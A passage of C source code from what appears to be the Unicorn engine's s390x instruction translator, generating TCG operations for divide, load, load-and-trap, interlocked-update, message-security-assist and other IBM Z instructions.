tcg_invert_cond(ltgt_cond[m3]); if (s->insn->data) { c = tcg_unsigned_cond(c); } tcg_gen_brcond_i64(tcg_ctx, c, o->in1, o->in2, lab); /* Trap. */ gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_cuXX(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int m3 = get_field(s, m3); int r1 = get_field(s, r1); int r2 = get_field(s, r2); TCGv_i32 tr1, tr2, chk; /* R1 and R2 must both be even. 
*/ if ((r1 | r2) & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (!s390_has_feat(s->uc, S390_FEAT_ETF3_ENH)) { m3 = 0; } tr1 = tcg_const_i32(tcg_ctx, r1); tr2 = tcg_const_i32(tcg_ctx, r2); chk = tcg_const_i32(tcg_ctx, m3); switch (s->insn->data) { case 12: gen_helper_cu12(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; case 14: gen_helper_cu14(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; case 21: gen_helper_cu21(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; case 24: gen_helper_cu24(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; case 41: gen_helper_cu41(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; case 42: gen_helper_cu42(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; default: //g_assert_not_reached(); break; } tcg_temp_free_i32(tcg_ctx, tr1); tcg_temp_free_i32(tcg_ctx, tr2); tcg_temp_free_i32(tcg_ctx, chk); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_diag(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); TCGv_i32 func_code = tcg_const_i32(tcg_ctx, get_field(s, i2)); gen_helper_diag(tcg_ctx, tcg_ctx->cpu_env, r1, r3, func_code); tcg_temp_free_i32(tcg_ctx, func_code); tcg_temp_free_i32(tcg_ctx, r3); tcg_temp_free_i32(tcg_ctx, r1); return DISAS_NEXT; } static DisasJumpType op_divs32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_divs32(tcg_ctx, o->out2, tcg_ctx->cpu_env, o->in1, o->in2); return_low128(tcg_ctx, o->out); return DISAS_NEXT; } static DisasJumpType op_divu32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_divu32(tcg_ctx, o->out2, tcg_ctx->cpu_env, o->in1, o->in2); return_low128(tcg_ctx, o->out); return DISAS_NEXT; } static DisasJumpType op_divs64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_divs64(tcg_ctx, o->out2, tcg_ctx->cpu_env, o->in1, o->in2); return_low128(tcg_ctx, o->out); return DISAS_NEXT; } static DisasJumpType op_divu64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_divu64(tcg_ctx, o->out2, tcg_ctx->cpu_env, o->out, o->out2, o->in2); return_low128(tcg_ctx, o->out); return DISAS_NEXT; } static DisasJumpType op_deb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_deb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_ddb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_ddb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_dxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_dxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->out, o->out2, o->in1, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_ear(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r2 = get_field(s, r2); tcg_gen_ld32u_i64(tcg_ctx, o->out, tcg_ctx->cpu_env, offsetof(CPUS390XState, aregs[r2])); return DISAS_NEXT; } static DisasJumpType op_ecag(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* No cache information provided. 
*/ tcg_gen_movi_i64(tcg_ctx, o->out, -1); return DISAS_NEXT; } static DisasJumpType op_efpc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld32u_i64(tcg_ctx, o->out, tcg_ctx->cpu_env, offsetof(CPUS390XState, fpc)); return DISAS_NEXT; } static DisasJumpType op_epsw(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r2 = get_field(s, r2); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); /* Note the "subsequently" in the PoO, which implies a defined result if r1 == r2. Thus we cannot defer these writes to an output hook. */ tcg_gen_shri_i64(tcg_ctx, t, tcg_ctx->psw_mask, 32); store_reg32_i64(tcg_ctx, r1, t); if (r2 != 0) { store_reg32_i64(tcg_ctx, r2, tcg_ctx->psw_mask); } tcg_temp_free_i64(tcg_ctx, t); return DISAS_NEXT; } static DisasJumpType op_ex(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); TCGv_i32 ilen; TCGv_i64 v1; /* Nested EXECUTE is not allowed. */ if (unlikely(s->ex_value)) { gen_program_exception(s, PGM_EXECUTE); return DISAS_NORETURN; } update_psw_addr(s); update_cc_op(s); if (r1 == 0) { v1 = tcg_const_i64(tcg_ctx, 0); } else { v1 = tcg_ctx->regs[r1]; } ilen = tcg_const_i32(tcg_ctx, s->ilen); gen_helper_ex(tcg_ctx, tcg_ctx->cpu_env, ilen, v1, o->in2); tcg_temp_free_i32(tcg_ctx, ilen); if (r1 == 0) { tcg_temp_free_i64(tcg_ctx, v1); } return DISAS_PC_CC_UPDATED; } static DisasJumpType op_fieb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_fieb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_fidb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_fidb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_fixb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_fixb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); return_low128(tcg_ctx, o->out2); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_flogr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* We'll use the original input for cc computation, since we get to compare that against 0, which ought to be better than comparing the real output against 64. It also lets cc_dst be a convenient temporary during our computation. */ gen_op_update1_cc_i64(s, CC_OP_FLOGR, o->in2); /* R1 = IN ? CLZ(IN) : 64. */ tcg_gen_clzi_i64(tcg_ctx, o->out, o->in2, 64); /* R1+1 = IN & ~(found bit). Note that we may attempt to shift this value by 64, which is undefined. But since the shift is 64 iff the input is zero, we still get the correct result after and'ing. */ tcg_gen_movi_i64(tcg_ctx, o->out2, 0x8000000000000000ull); tcg_gen_shr_i64(tcg_ctx, o->out2, o->out2, o->out); tcg_gen_andc_i64(tcg_ctx, o->out2, tcg_ctx->cc_dst, o->out2); return DISAS_NEXT; } static DisasJumpType op_icm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int m3 = get_field(s, m3); int pos, len, base = s->insn->data; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); uint64_t ccm; switch (m3) { case 0xf: /* Effectively a 32-bit load. 
*/ tcg_gen_qemu_ld32u(tcg_ctx, tmp, o->in2, get_mem_index(s)); len = 32; goto one_insert; case 0xc: case 0x6: case 0x3: /* Effectively a 16-bit load. */ tcg_gen_qemu_ld16u(tcg_ctx, tmp, o->in2, get_mem_index(s)); len = 16; goto one_insert; case 0x8: case 0x4: case 0x2: case 0x1: /* Effectively an 8-bit load. */ tcg_gen_qemu_ld8u(tcg_ctx, tmp, o->in2, get_mem_index(s)); len = 8; goto one_insert; one_insert: pos = base + ctz32(m3) * 8; tcg_gen_deposit_i64(tcg_ctx, o->out, o->out, tmp, pos, len); ccm = ((1ull << len) - 1) << pos; break; default: /* This is going to be a sequence of loads and inserts. */ pos = base + 32 - 8; ccm = 0; while (m3) { if (m3 & 0x8) { tcg_gen_qemu_ld8u(tcg_ctx, tmp, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 1); tcg_gen_deposit_i64(tcg_ctx, o->out, o->out, tmp, pos, 8); ccm |= 0xffull << pos; } m3 = (m3 << 1) & 0xf; pos -= 8; } break; } tcg_gen_movi_i64(tcg_ctx, tmp, ccm); gen_op_update2_cc_i64(s, CC_OP_ICM, tmp, o->out); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_insi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int shift = s->insn->data & 0xff; int size = s->insn->data >> 8; tcg_gen_deposit_i64(tcg_ctx, o->out, o->in1, o->in2, shift, size); return DISAS_NEXT; } static DisasJumpType op_ipm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t1, t2; gen_op_calc_cc(s); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extract_i64(tcg_ctx, t1, tcg_ctx->psw_mask, 40, 4); t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t2, tcg_ctx->cc_op); tcg_gen_deposit_i64(tcg_ctx, t1, t1, t2, 4, 60); tcg_gen_deposit_i64(tcg_ctx, o->out, o->out, t1, 24, 8); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); return DISAS_NEXT; } static DisasJumpType op_idte(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m4; if (s390_has_feat(s->uc, S390_FEAT_LOCAL_TLB_CLEARING)) { m4 = tcg_const_i32(tcg_ctx, get_field(s, m4)); } else { m4 = tcg_const_i32(tcg_ctx, 0); } gen_helper_idte(tcg_ctx, tcg_ctx->cpu_env, o->in1, o->in2, m4); tcg_temp_free_i32(tcg_ctx, m4); return DISAS_NEXT; } static DisasJumpType op_ipte(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m4; if (s390_has_feat(s->uc, S390_FEAT_LOCAL_TLB_CLEARING)) { m4 = tcg_const_i32(tcg_ctx, get_field(s, m4)); } else { m4 = tcg_const_i32(tcg_ctx, 0); } gen_helper_ipte(tcg_ctx, tcg_ctx->cpu_env, o->in1, o->in2, m4); tcg_temp_free_i32(tcg_ctx, m4); return DISAS_NEXT; } static DisasJumpType op_iske(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_iske(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_msa(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = have_field(s, r1) ? get_field(s, r1) : 0; int r2 = have_field(s, r2) ? get_field(s, r2) : 0; int r3 = have_field(s, r3) ?
get_field(s, r3) : 0; TCGv_i32 t_r1, t_r2, t_r3, type; switch (s->insn->data) { case S390_FEAT_TYPE_KMCTR: if (r3 & 1 || !r3) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* FALL THROUGH */ case S390_FEAT_TYPE_PPNO: case S390_FEAT_TYPE_KMF: case S390_FEAT_TYPE_KMC: case S390_FEAT_TYPE_KMO: case S390_FEAT_TYPE_KM: if (r1 & 1 || !r1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* FALL THROUGH */ case S390_FEAT_TYPE_KMAC: case S390_FEAT_TYPE_KIMD: case S390_FEAT_TYPE_KLMD: if (r2 & 1 || !r2) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* FALL THROUGH */ case S390_FEAT_TYPE_PCKMO: case S390_FEAT_TYPE_PCC: break; default: // g_assert_not_reached(); break; }; t_r1 = tcg_const_i32(tcg_ctx, r1); t_r2 = tcg_const_i32(tcg_ctx, r2); t_r3 = tcg_const_i32(tcg_ctx, r3); type = tcg_const_i32(tcg_ctx, s->insn->data); gen_helper_msa(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t_r1, t_r2, t_r3, type); set_cc_static(s); tcg_temp_free_i32(tcg_ctx, t_r1); tcg_temp_free_i32(tcg_ctx, t_r2); tcg_temp_free_i32(tcg_ctx, t_r3); tcg_temp_free_i32(tcg_ctx, type); return DISAS_NEXT; } static DisasJumpType op_keb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_keb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_kdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_kdb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_kxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_kxb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->out, o->out2, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_laa(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* The real output is indeed the original value in memory; recompute the addition for the computation of CC. */ tcg_gen_atomic_fetch_add_i64(tcg_ctx, o->in2, o->in2, o->in1, get_mem_index(s), s->insn->data | MO_ALIGN); /* However, we need to recompute the addition for setting CC. */ tcg_gen_add_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_lan(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* The real output is indeed the original value in memory; recompute the operation for the computation of CC. */ tcg_gen_atomic_fetch_and_i64(tcg_ctx, o->in2, o->in2, o->in1, get_mem_index(s), s->insn->data | MO_ALIGN); /* However, we need to recompute the operation for setting CC. */ tcg_gen_and_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_lao(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* The real output is indeed the original value in memory; recompute the operation for the computation of CC. */ tcg_gen_atomic_fetch_or_i64(tcg_ctx, o->in2, o->in2, o->in1, get_mem_index(s), s->insn->data | MO_ALIGN); /* However, we need to recompute the operation for setting CC. */ tcg_gen_or_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_lax(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* The real output is indeed the original value in memory; recompute the operation for the computation of CC. */ tcg_gen_atomic_fetch_xor_i64(tcg_ctx, o->in2, o->in2, o->in1, get_mem_index(s), s->insn->data | MO_ALIGN); /* However, we need to recompute the operation for setting CC.
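The atomic fetch-xor above returns only the old memory value, while LOAD AND EXCLUSIVE OR sets the CC from the result, so the XOR is redone on the fetched value.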
*/ tcg_gen_xor_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_ldeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_ldeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return DISAS_NEXT; } static DisasJumpType op_ledb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_ledb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_ldxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_ldxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_lexb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_lexb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_lxdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_lxdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_lxeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_lxeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_lde(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_shli_i64(tcg_ctx, o->out, o->in2, 32); return DISAS_NEXT; } static DisasJumpType op_llgt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_andi_i64(tcg_ctx, o->out, o->in2, 0x7fffffff); return DISAS_NEXT; } static DisasJumpType op_ld8s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld8s(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld8u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld8u(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld16s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld16s(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld16u(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld32s(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld32u(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_ld64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_ld64(tcg_ctx, o->out, o->in2, get_mem_index(s)); return DISAS_NEXT; } static DisasJumpType op_lat(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *lab = gen_new_label(tcg_ctx); store_reg32_i64(tcg_ctx, get_field(s, r1), o->in2); /* The value is stored even in case of trap. 
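LOAD AND TRAP writes R1 unconditionally and traps only when the loaded value is zero, hence the conditional branch around gen_trap below.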
*/ tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_NE, o->in2, 0, lab); gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_lgat(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_qemu_ld64(tcg_ctx, o->out, o->in2, get_mem_index(s)); /* The value is stored even in case of trap. */ tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_NE, o->out, 0, lab); gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_lfhat(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *lab = gen_new_label(tcg_ctx); store_reg32h_i64(tcg_ctx, get_field(s, r1), o->in2); /* The value is stored even in case of trap. */ tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_NE, o->in2, 0, lab); gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_llgfat(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_qemu_ld32u(tcg_ctx, o->out, o->in2, get_mem_index(s)); /* The value is stored even in case of trap. */ tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_NE, o->out, 0, lab); gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_llgtat(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGLabel *lab = gen_new_label(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, o->out, o->in2, 0x7fffffff); /* The value is stored even in case of trap. */ tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_NE, o->out, 0, lab); gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_loc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; DisasCompare c; disas_jcc(s, &c, get_field(s, m3)); if (c.is_64) { tcg_gen_movcond_i64(tcg_ctx, c.cond, o->out, c.u.s64.a, c.u.s64.b, o->in2, o->in1); free_compare(tcg_ctx, &c); } else { TCGv_i32 t32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 t, z; tcg_gen_setcond_i32(tcg_ctx, c.cond, t32, c.u.s32.a, c.u.s32.b); free_compare(tcg_ctx, &c); t = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t, t32); tcg_temp_free_i32(tcg_ctx, t32); z = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, o->out, t, z, o->in2, o->in1); tcg_temp_free_i64(tcg_ctx, t); tcg_temp_free_i64(tcg_ctx, z); } return DISAS_NEXT; } static DisasJumpType op_lctl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_lctl(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); /* Exit to main loop to reevaluate s390_cpu_exec_interrupt. */ return DISAS_PC_STALE_NOCHAIN; } static DisasJumpType op_lctlg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_lctlg(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); /* Exit to main loop to reevaluate s390_cpu_exec_interrupt. 
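Reloading control registers can change interrupt masking, so the TB must end without chaining so that pending interrupts are reconsidered.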
*/ return DISAS_PC_STALE_NOCHAIN; } static DisasJumpType op_lra(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_lra(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_lpp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_st_i64(tcg_ctx, o->in2, tcg_ctx->cpu_env, offsetof(CPUS390XState, pp)); return DISAS_NEXT; } static DisasJumpType op_lpsw(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t1, t2; per_breaking_event(s); t1 = tcg_temp_new_i64(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t1, o->in2, get_mem_index(s), MO_TEUL | MO_ALIGN_8); tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 4); tcg_gen_qemu_ld32u(tcg_ctx, t2, o->in2, get_mem_index(s)); /* Convert the 32-bit PSW_MASK into the 64-bit PSW_MASK. */ tcg_gen_shli_i64(tcg_ctx, t1, t1, 32); gen_helper_load_psw(tcg_ctx, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); return DISAS_NORETURN; } static DisasJumpType op_lpswe(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t1, t2; per_breaking_event(s); t1 = tcg_temp_new_i64(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, t1, o->in2, get_mem_index(s), MO_TEQ | MO_ALIGN_8); tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 8); tcg_gen_qemu_ld64(tcg_ctx, t2, o->in2, get_mem_index(s)); gen_helper_load_psw(tcg_ctx, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); return DISAS_NORETURN; } static DisasJumpType op_lam(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); gen_helper_lam(tcg_ctx, tcg_ctx->cpu_env, r1, o->in2, r3); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_lm32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i64 t1, t2; /* Only one register to read. */ t1 = tcg_temp_new_i64(tcg_ctx); if (unlikely(r1 == r3)) { tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); store_reg32_i64(tcg_ctx, r1, t1); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } /* First load the values of the first and last registers to trigger possible page faults. */ t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, t2, o->in2, 4 * ((r3 - r1) & 15)); tcg_gen_qemu_ld32u(tcg_ctx, t2, t2, get_mem_index(s)); store_reg32_i64(tcg_ctx, r1, t1); store_reg32_i64(tcg_ctx, r3, t2); /* Only two registers to read. */ if (((r1 + 1) & 15) == r3) { tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } /* Then load the remaining registers. Page fault can't occur. */ r3 = (r3 - 1) & 15; tcg_gen_movi_i64(tcg_ctx, t2, 4); while (r1 != r3) { r1 = (r1 + 1) & 15; tcg_gen_add_i64(tcg_ctx, o->in2, o->in2, t2); tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); store_reg32_i64(tcg_ctx, r1, t1); } tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_lmh(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i64 t1, t2; /* Only one register to read. 
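With r1 == r3, LMH degenerates to a single 32-bit load placed into the high half of the register.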
